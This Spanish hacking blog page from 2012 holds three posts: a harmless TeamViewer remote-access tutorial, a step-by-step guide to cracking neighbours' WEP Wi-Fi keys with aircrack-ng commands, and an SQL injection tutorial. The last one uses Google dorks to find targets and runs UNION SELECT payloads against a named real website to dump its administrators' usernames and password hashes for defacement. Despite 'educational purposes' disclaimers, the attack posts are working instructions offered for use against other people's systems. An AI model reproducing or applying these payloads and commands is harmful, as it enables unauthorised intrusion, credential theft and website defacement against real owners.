[H]ACKMUNDY - [L]ABS

Bienvenidos a [H]ACKMUNDY - [L]ABS....

Backtrack

Aprende Conceptos Basicos de Backtrack...

Informatica

Blog dedicado para Aprende y entender la Informatica......

Programacion

Aprende Nociones Basicas para iniciarte en la programacion...

Personalizacion

Aprende a Personalizar tu PC, blog........

sábado, 28 de enero de 2012

TeamViewer (Controlar equipos remotos a través de Internet)


En este tutorial vamos a explicar paso a paso cómo controlar equipos remotos a través de Internet usando TeamViewer.

Gracias a TeamViewer podemos controlar equipos a través de Internet sin tener que preocuparnos del tipo de sistema operativo porque podemos conectarnos con Linux. Windows y Mac (cada uno usando la versión de TeamViewer correspondiente), ni de abrir puertos en el router ni en el firewall, ni tan siquiera tenemos que escoger el tipo de protocolo o la contraseña. Todo eso lo hace TeamViewer por nosotros, y lo hace muy bien.

Sin duda es uno de los programas de control remoto más fácil de usar. Sin embargo, no es libre aunque sí gratuito para uso personal. En cualquier caso, vamos a ver como instalarlo y utilizarlo en Ubuntu 11.04.

Instalación

TeamViewer dispone de varias versiones para Windows (Completa, QuickSupport, Host, Portable, Manager y MSI) y Mac (Completa, QuickSupport y Manager), a las que te recomiendo que les eches un vistazo por si te son de utilidad. Sin embargo, para Linux sólo tenemos la versión completa, que será la que debamos instalar tanto en nuestro equipo como en aquel que queramos administrar.

Para instalar la versión completa de TeamViewer en Ubuntu 10.04 sólo tenemos que seguir los siguientes pasos:

1.- Lo primero es acceder a la página web de descarga de TeamViewer y hacer clic para descargar el paquete correspondiente a nuestro sistema. En mi caso, Debian, Ubuntu (64-bit).


2.- Después guardamos el paquete correspondiente en nuestro equipo.
3.- Y lo ejecutamos haciendo doble clic sobre él.
4.- Se abrirá el instalador de paquetes y lo instalaremos pulsando el botón Instalar el paquete.
5.- Cuando termine, cerraremos la ventana del instalador.


Ejecución

1.- Una vez instalado TeamViewer lo ejecutamos desde el menú Aplicaciones > Internet > TeamViewer.

2.-El programa nos muestra automáticamente la información necesaria que deberemos suministrar al que quiera conectarse a nuestro equipo: ID y contraseña. La ID será siempre la misma para cada equipo, mientras que la contraseña podemos configurarla para que cambie cada vez que se finalice una conexión. 

Control de un equipo remoto

1.- Partiendo de la base de que tenemos instalado TeamViewer tanto en nuestro equipo (servidor) como en aquel que queremos administrar (cliente) y que lo hemos ejecutado en ambos equipos, necesitaremos para establecer la conexión disponer de la ID y de la contraseña del cliente que normalmente se solucionará con una llamada telefónica.
En la ventana de TeamViewer de nuestro equipo escribimos la ID del equipo al que nos queremos conectar (138 461 746) y hacemos clic en Conectar con asociado.

2.- A continuación, escribimos también la contraseña del cliente al que nos vamos a conectar. En el ejemplo, 9484


 3.- Se abrirá una ventana en la que veremos el escritorio del equipo cliente y que podemos empezar a controlar.

4.- Para finalizar la conexión podemos pulsar la X que vemos en la barra de herramientas de TeamViewer.

Seguridad

Uno de los aspectos que más preocupa en este tipo de programas es la seguridad. Por eso, Teamviwer tiene una página completa sobre seguridad en la que afirma que  utiliza tanto RSA como AES (256 bits) para las conexiones. Como RSA es un sistema criptográfico asimétrico necesita dos claves, una pública y otra privada. De esta forma, al permanecer en todo momento la clave privada oculta tanto al equipo cliente como a los propios servidores de TeamViewer se impide que se descifren los datos que viajan por Internet.
Además, TeamViewer cambia la clave de conexión automáticamente cada vez que finaliza una conexión para impedir el acceso remoto no autorizado a nuestro equipo.

Otras Formas de Uso


También podemos utilizar TeamViewer para controlar los equipos de nuestra red local. De esta forma aumenta considerablemente la velocidad de transmisión de los datos y, por lo tanto, la rapidez con la que interactuamos con el equipo cliente.
Para hacer que TeamViewer funcione sin acceder a Internet tendremos que habilitar la opción correspondiente y, en el campo ID, en lugar de escribir el ID, teclearemos la dirección IP del cliente. Por último, antes de empezar con el tutorial, simplemente recordar que se supone que debemos tener instalado y ejecutándose TeamViewer tanto en el equipo cliente como en el servidor.

En el cliente (el que queremos controlar desde el nuestro):

1.- Accedemos a las opciones de TeamViewer del equipo al que queremos conectarnos desde el menú Extras > Opciones.
 2.- En Conexiones de LAN entrantes (mediante dirección IP) seleccionamos Aceptar .
 3.- Antes de continuar debemos averiguar la IP de este equipo.

En el servidor (el que va a controlar al cliente): 

1.- Ahora en nuestro equipo en el campo ID escribimos la dirección IP del equipo al que queremos conectarnos y hacemos clic en Conectar con asociado
2.- Escribimos la contraseña.
3.- Y ya podemos administrar remotamente el equipo con la ventaja de usar solamente nuestra LAN.

Bueno eso fue todo espero que les resulte úti.

miércoles, 25 de enero de 2012

Como hackear redes wireless WEP con Aircrack-NG

Hola bueno "este tutorial es con fines educativos" quiero compartir algo muy interesante y extremadamente útil con ustedes. Sin más preambulos, desearia contarles como pueden hacer para ver si su red wireless es segura o no. O simplemente mostrarle a un amigo que su red no es del todo segura, o para acceder a alguna red en caso de una emergencia… Por ahora lo he implementado con claves WEP pero WPA2 no va a tardar en caer.
Me remitiré solamente a repasar brevemente los pasos necesarios para sacar una clave. La aplicación que podemos usar es aircrack-ng y les cuento rápidamente como hice en ubuntu. Aircrack-ng es una suite con aplicaciones para auditar redes. Me basé en un tutorial que encuentran en la página, así que plis, busquen más info detallada allí. Además, esta aplicación corre en Windows, el doble de diversion. Primero, descargamos la aplicación desde los repositorios como de costumbre:

>> sudo apt-get install aircrack-ng

Viendo la documentación, debemos chequear que nuestra tarjeta wifi soporta el modo de "monitoreo". Si en tu máquina tienes ubuntu y tu tarjeta corre con los drivers propietarios o con los libres, es muy probable que funcione. Si corres ndiswrapper, quizás no puedas (mi experiencia con Atheros 5670AR en Hardy Heron). Por favor verfica la documentación por más detalles en la pagina de documentacion Esta en ingles pero bueno.
Comenzamos por sacar información sobre las redes disponibles a nuestro alcance, ver si tienen clave WEP y/o WPA-WPA2. Si hay alguna con señal favorable con clave WEP, seguimos por obtener información útil de nuestra tarjeta (wlan0 en mi caso), precisaremos la MAC address de la misma. Veamos que hay en la vuelta con iwlist:

>> sudo iwlist wlan0 scan

de paso tomamos nota del MAC address de nuestra tarjeta:

>> sudo ifconfig

Bien, probaremos nuestro ataque a la dirección 1, que de ahora en adelante me referiré a ella como conección objetivo.

1. Anotamos los siguientes datos de nuestro objetivo: Address, ESSID y channel. En nuestro ejemplo, Address "00:14:6C:7E:40:80", ESSID "objetivo" y channel "1". La MAC de nuestra tarjeta de ejemplo será "00:0F:B5:88:AC:82". Asi que precisaremos la Address de la red, o punto de acceso, el canal donde transmite, nuestra dirección MAC y que interface usamos.

2. Con esto, ponemos nuestra tarjeta en modo de monitero. Notar que precisamos el canal para monitorear la actividad en el mismo, por ejemplo 1. Utilizamos airmon-ng, dentro de la suite, o sea ya estara instalada al bajar aircrack-ng, con la siguiente sintaxis, airmon-ng "start/stop" "interface" "canal", es decir:

>> sudo airmon-ng start wlan0

La aplicación generará un nueva interface, comunmente llamada mon0, si haces ifconfig la puedes ver, tranquilo que podemos quitarla más adelante.

3. Ahora probemos si podemos inyectar paquetes en el objtevio, esto lo hacemos con aireplay-ng. Nota: es aconsejable probar con señales intensas, tambien considera que debemos comunicarnos con la red para inyectar "paquetes" (packets) en esta, por lo que la cercania es crucial. Probemos si estamos a distancia para inyectar paquetes:

>> aireplay-ng -9 -e objetivo -a 00:14:6C:7E:40:80 mon0

-9 (prueba inyeccion) -e "ESSID nombre de la red" -a "MAC Address" "interface"

4. Con todo bien, pasamos a recolectar los futuros paquetes (packets) que precisaremos en nuestro ataque. La aplicación es airodump-ng con una sintaxis similar, -c el channel, –bssid la direccion MAC del punto de acceso y -w escribe (write) la salida a un archico "output", de nuevo, la interface , "mon0". Es decir:

>> airodump-ng -c 1 –bssid 00:14:6C:7E:40:80 -w output mon0

Debe verse algo asi:
http://cl.alone.cl/462airodump_tn.jpg
5. Ahora pasemos a hacer una autentificación falsa en el punto de acceso, necesario para poder inyectar los "paquetes" en la red. Para poder hacer esto necesitamos que la dirección MAC fuente en nuestra tarjeta esté asociada en el punto de acceso antes de enviar "paquetes" a esta. Utilizamos aireplay-ng con la sintaxis, -1 6000 -0 1 -q 10 -e "ESSID" -a "Address" -h "MAC Address de nuestra tarjeta" "interface", es decir

>> aireplay-ng -1 6000 -0 1 -q 10 -e objetivo -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0

Aquí usamos una re-autentificación como la (opción -1), cada 6000 seg, mandando un "paquete" (packets) a la vez (-o 1), y que mandaremos "paquetes vivos" cada 10 segundos(-q 10).(funciona para puntos de acceso quisquillosos) Usamos "ESSID" como el nombre de la red, "Address" como la dirección de esta, "MAC Address" como nuestra dirección MAC e "interface" como mon0.
Si todo va bien, comensaríamos a tener respuestas a nuestros paquetes, debemos estar atentos al airodump-ng y verificar si la cantidad de datos aumenta. Es imprescindible que la red este en uso, ya que de otra forma no conseguiremos datos de la misma.
http://cl.alone.cl/653association_tn.jpg

Recuerda que para que esto funcione, debes recibir continuamente los mensajes Sending keep_alive packet. Luego del mensaje: Association successful :-)

6. Bien, habiendo dejado un tiempo para recolectar datos, 20.000 "paquetes" para el este método y 40.000 para claves en 128bit, nos aprontamos para el ataque! Esto lo hacemos buscando la clave en los datos recogidos en los archivos output.cap, que seran varios. Para que vean, mientras escribía esto, me puse a atacar una red, luego de los 10 min, comenzó el flujo de datos. Viendo en airodump-ng hay una razon de 452/s muy buena, es decir que me conecte y recibo 60kb/s de datos!. Ahora tengo mas de 1.000.000 paquetes, así que voy al ataque.
http://usa.alone.cl/564funcionando_tn.jpg
7. Utilizamos ahora si aircrack-ng con la sintaxis, -b "Address" "archivo"

>> aircrack-ng -b 00:14:6C:7E:40:80 output*.cap

http://usa.alone.cl/732final_tn.jpg

Cerramos los programas (airodump-ng, aireplay-ng, etc) y vamos a entrar

8. Empezamos por detener el monitoreo

>> sudo airmon-ng stop mon0 1

esto elimina la interface ficticia mon0

>> sudo airmon-ng stop wlan0

esto deshabilita el monitoreo en la tarjeta wlan0. Ahora, levantamos la interface, es decir, nuestra tarjeta

>> sudo ifconfig wlan0 up

chequeamos que este en listada (con ifconfig) y listo, ingresamos la clave!. Recuerden de quitar los puntos entre los números, la primera vez que lo corrí demoré 3 min en obtener una clave, como no funcionaba pense que estaba mal, mal estaban los puntos entre los números, jeje. Algunos detalles, es preciso que la red tenga tráfico y que tengas una buena señal, digamos arriba del 20/100. Este metodo no funciona con claves WPA o WPA2, es mas complicado, un poquito, pero no bien le entre a una lo posteo. Este método tampoco funciona para redes con filtro de direcciones MAC, precisaríamos saber una MAC de una máquina para entrar, sorry. En mi experiencia en casa, he podido entrarte a 3 WEP, una de ellas con muy baja señal, habiendo probado al menos 1 intentos fallido en cada una, quizás por problemas de tráfico. En el trabajo, probé y no había respuesta, entonces, fui a una pc, hice "click" en "redes" y desencadenó un torrente de datos recibidos en mi máquina y en menos de 5min tenia la clave, por eso es crucial que haya tráfico. Por problemas comunes plis, ver la documentación oficial!

Nota sobre Etica. Les ruego a quienes lo implementen, no destruyan redes bajando torrents, eso los llevará a problemas, cambios de clave, encriptación WPA2 de 128bit, filtro MAC y una cuenta a pagar para el pobre vecino.
Si deseas tener máxima seguridad en tu red, prueba contraseñas largas, con 64 caracteres y la encriptación WPA2 de 128bits. Las claves WPA2 son muy robustas y prácticamente inviolables. Por eso es muy recomendable utilizar esa encriptación para mayor seguridad.

lunes, 23 de enero de 2012

SQL Injection

  • SQL Injection Basica


Este Tutorial es con Fines educativos no me Hago responzable del mal uso que le den.

Que es SQL Inyeccion

Inyección SQL es un método de infiltración de código intruso que se vale de una Vulnerabilidad Informatica presente en una aplicación en el nivel de validación de las entradas para realizar consultas a una Base de Datos. El origen de la vulnerabilidad radica en el incorrecto chequeo y/o filtrado de las variables utilizadas en un programa que contiene, o bien genera, código SQL. Es, de hecho, un error de una clase más general de vulnerabilidades que puede ocurrir en cualquier lenguaje de Programacion o Script que esté embebido dentro de otro. Se conoce como Inyección SQL, indistintamente, al tipo de vulnerabilidad, al método de infiltración, al hecho de incrustar código SQL intruso y a la porción de código incrustado.
  
Estrucura o diseño de una web que podria ser vulnerable:

Una posible web vulnerable llevaria el siguiente diseño o estructura en su dirección web:

www.urldelaweb.com/pagina.php?id=15

En la parte de pagina podria llevar cualquier otro nombre (music,noticias,notas,libros,etc) les puse pagina comoejemplo simple nada más. El .php?id= es obligatorio que siga de esa misma forma (sin cambios). 
Ahora para terminar en la parte del numero en este caso 15 este tambien puede variar y no afecta, podria serde 0 a infinito eso lo veran a lo largo de sus practicas


A la Practica:

Bueno aquí es donde empieza la Practica vamos a buscar una pagina web vulnerable en GOOGLE para ello nos digiriremos al buscador de google y escribiremos:

php?id=          O           info_page.php?=

 Bueno cuando encontremos una pagina la que yo escoji fue esta (http://microngc.net/info_page.php?id=9) ahora si vamos a proceder con lo que seria una consulta para ver si es vulnerable o no tendríamos que poner esto:

http://microngc.net/info_page.php?id=-1
http://microngc.net/info_page.php?id=”2
http://microngc.net/info_page.php?id=9999
http://microngc.net/info_page.php?id==-

esas son las consultas básicas que veremos en este tutorial bueno probamos con cualquiera de estas consultas y bueno porque genera este error; bueno porque seria algo raro ver una pagina web que tenga caracteres con estos simbolos “ o -1; bueno cuando hagamos la consulta nos tiene que salir este pequeño texto:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

Bueno como vemos el sitio en vulnerable a MySql, Aca termina esta sección asi que si ya se aburrieron bueno pues cierren este Blogger no hay problema y si no pues sigan leyendo xD.


Comenzar Ataque

Bueno amigos veo que les intereso mi Blogger bueno cambiando el tema en esta sección lo que vamos a realizar es a efectuar el ataque bueno como ya se supone que encontramos la pagina vulnerable ahora empecemos a jugar con la pagina xD.

Bueno amigos como vimos la pagina es:

http://microngc.net/info_page.php?id=9
ahora lo que hare es consultar si es vulnerable. 
 http://microngc.net/info_page.php?id=-1

Nos tiraria el error antes mencionado de mySQL. Ahora procedemos a poner esto en la url:

http://microngc.net/info_page.php?id=-1+union+select+1--

bueno explicare que hice aquí: lo que hice fue poner el -1, luego poner +unión+select que significa que yo quiero unir la la vulneribilidad que acabo de encontrar luego el +1—aquí vamos a ir poniendo los números del 1 hasta el infinito con coma obviamente “,” xD hasta encontrar algún error en uno de esos números

¿pero que es lo que quieres decir?

Pues bueno ya vamos a eso! Bueno cuando ya tengamos nuestra pagina lista para buscar los errores procedemos a hacer lo que estaba explicando ahorita:

http://microngc.net/info_page.php?id=-1+union+select+1,2,3,4,5--

bueno como ven el mio fue corto llego hasta 5, pero tu pagina puede llegar al 7 o al 13 o hasta algunas veces puede llegar hasta el 45 o.O, bueno cuando ya tengamos hecho esto nos saldrá algo asi en la pagina



Con una serie de números en diferente orden bueno acontinuacion estos son los números que contienen los errores bueno ahora lo que procederemos a hacer es colocar este código es uno de los números que te saldrá por ejemplo asi si no entendiste:

http://microngc.net/info_page.php?id=-1+union+all+select+1,2,group_concat%28table_name%29,4,5+from+information_schema.tables--

como ven yo sustituí el 3 por el código, esta aquí para que lo copien:
group_concat%28table_name%29
bueno el %28 y %29 son los simbolos de ( ) solo que estan es ascii, bueno ahora lo que hara este código es sacarnos todas las tablas de una sola vez hay otra método pero es mas aburrido xD, bueno ya haciendo esto ahora volveremos otra vez a la url y pondremos:
+from+information_schema.table-- 

Nota: Yo primero la puse en algunas web se debe poner todo completo para que funcione asi como en la mia.

Esto que nos sacara la info de schema tables bueno hay ponerlo despues del numero final en mi caso fue el 5. Asi:

bueno para ser lógicos amigos puedes salir varias palabras en la tabla como usuario,usuarios,users….etc
bueno ya cuando encontremos la tabla procedemos a sacar las columnas que tiene esta para ello guardamos la palabra que nos salió de usuarios que en mi caso es esta: administrators .
Bueno ahora lo que procedemos a hacer es pasar la palabra a hexadecimal para ello nos digiriremos a esta web:         http://www.swingnote.com/tools/texttohex.php

Muy bien de ahí nos vamos adonde dice string que hay un cuadro a la par y pondremos la palabra de usuarios que nos salió en mi caso a mi me dio asi: 61646d696e6973747261746f7273
Es sencillo es dificil que se pierdan nada mas copian la palabra y pegan en el cuadro y luego le dan convert y se van donde dice “HEX” y ahí copean ese código y listo xD
Bueno cuando ya tengamos este código lo que haremos ser poner la url con estos parámetros ;)

http://microngc.net/info_page.php?id=-1+union+all+select+1,2,group_concat%28column_name%29,4,5+from+information_schema.columns+where+table_name=0x61646d696e6973747261746f7273--

bueno explicare; bueno primeramente borramos el código que había dado este: group_concat%28table_name%29 y colocamos debes de table_name ponemos column_name asi: group_concat%28column_name%29 porque se supone que vamos a sacar las columnas xD.

luego donde dice: +from+information_schema.columns+where+table_name=0x61646d696e6973747261746f7273-- aqui lo que agregamos diferente fue despues de “schema.” Pusimos columns y luego le consultamos que busque la columna de usuarios y que donde esta o algo asi jeje que es esta palabra where luego agregamos que queremos que nos diga donde esta que seria”+table_name=”aquí nada mas vamos a nombrar cual tabla es la que queremos ver que seria la de usuarios pero lo que vamos a poner aquí es el code hexadecimal que en mi caso es este: 61646d696e6973747261746f7273
pero lo único diferente es que tenernos que colocar un “0x” y al ultimo ponemos -- entonces quedaría algo asi: 0x61646d696e6973747261746f7273--

Despues de esto nos mostrara o nos tirara la web la informacion que nesecitamos para defacearla en mi caso es:  id,user_name,user_password




Guardamos en un block de nota la informacion que nos voto que fue   id,user_name,user_password  la ponemos en el url pero modificamos un poco la sintaxis de ella asi:
 http://microngc.net/info_page.php?id=-1+union+all+select+1,2,group_concat%28id,0x3a,user_name,0x3a,user_password%29,4,5+from+administrators--

remplazamos group_concat%28column_name%29 por group_concat%28id,0x3a,user_name,0x3a,user_password%29  ponemos la info que encontramos en vez de column_name  separados por 0x3d para que no se vea todo junto y revuelto. 0x30 eso siempre va después del nombre de la columna si quieres sacar todos solo sustituyes los nombre o, no pongas 0x3a al ultimo. Despues en lo ultimo debes de poner +from+information_schema.columns+where+table_name=0x61646d696e6973747261746f7273--  pones +from+administrators-- donde administrators es el nombre de la tabla que convertimos anteriormente en hexadecfimal.



Y bueno esto es todo amigos luego después de eso les va a salir el login y la pass encriptada en MD5 o HASH o asi solita xD, si les sale en MD5 o HASH deben primero desincriptarla.

bueno y para que puedan sacar la pagina admin para loguearse en la page les recomiendo este programita es muy bueno, que lo uncio que tienen que hacer es poner la pagina simple como por ejemplo la mia seria asi:

http://www.microngc.net

Entonces le damos en scan lo dejamos asi como esta y empesara a buscar y cuando encuentre una page admin se te abrirá en tu navegador. Bueno descarga el programita aquí.

Web hosting